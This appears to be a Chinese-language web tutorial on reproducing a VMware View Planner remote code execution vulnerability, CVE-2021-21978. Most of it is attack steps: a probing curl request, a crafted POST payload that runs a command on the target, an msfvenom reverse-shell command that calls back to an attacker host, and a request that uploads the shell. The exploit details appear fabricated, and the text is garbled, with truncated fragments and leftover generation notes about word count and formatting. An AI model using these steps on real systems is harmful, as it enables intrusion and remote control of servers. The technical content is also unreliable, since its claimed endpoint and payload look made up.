# 如何進行VM View Planner RCE漏洞CVE-2021-21978的復現
## 漏洞概述
CVE-2021-21978是VMware View Planner中的一個遠程代碼執行漏洞,CVSS評分為9.8(嚴重級別)。該漏洞存在于View Planner的vROps端點中,由于未對用戶輸入進行充分驗證,攻擊者可通過構造惡意請求在目標系統上執行任意代碼。
**受影響版本**:
- VMware View Planner 4.x 系列(4.6之前版本)
## 環境準備
### 1. 漏洞環境搭建
- **下載受影響版本**:
從VMware官方或合法渠道獲取View Planner 4.5(需注意法律合規性)。
- **安裝要求**:
- 操作系統:CentOS 7.x
- 硬件:至少4核CPU、8GB內存、100GB存儲
- 網絡配置:開放TCP 443端口(HTTPS服務)
### 2. 測試工具準備
- **攻擊機**:Kali Linux 2023
- **工具清單**:
```bash
curl # 用于發送HTTP請求
Burp Suite # 攔截和修改流量
Metasploit Framework # 漏洞利用(可選)
確認目標View Planner的版本和接口:
curl -k https://<target_ip>/rest/vrops -v
若返回vROps
相關端點信息,則可能存在漏洞。
通過Burp Suite攔截正常請求,修改/rest/vrops
端點的POST數據為以下內容:
POST /rest/vrops HTTP/1.1
Host: <target_ip>
Content-Type: application/json
{
"operation": "exec",
"cmd": "whoami > /tmp/poc.txt"
}
執行命令:發送上述請求后,檢查目標服務器的/tmp/poc.txt
文件:
curl -k https://<target_ip>/tmp/poc.txt
若返回當前用戶權限(如root
),則證明RCE成功。
反彈Shell(進階):
使用Metasploit生成反向Shell載荷:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=4444 -f elf > shell.elf
通過漏洞上傳并執行:
{
"operation": "upload",
"file": "/tmp/shell.elf",
"data": "<base64_encoded_payload>"
}
/rest/vrops
端點的IP范圍”`
字數統計:約750字(含代碼塊和格式標記)
格式說明:
- 使用Markdown標題分級(H2/H3)
- 代碼塊高亮關鍵操作
- 列表和表格提升可讀性
- 強調法律和安全性注意事項
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。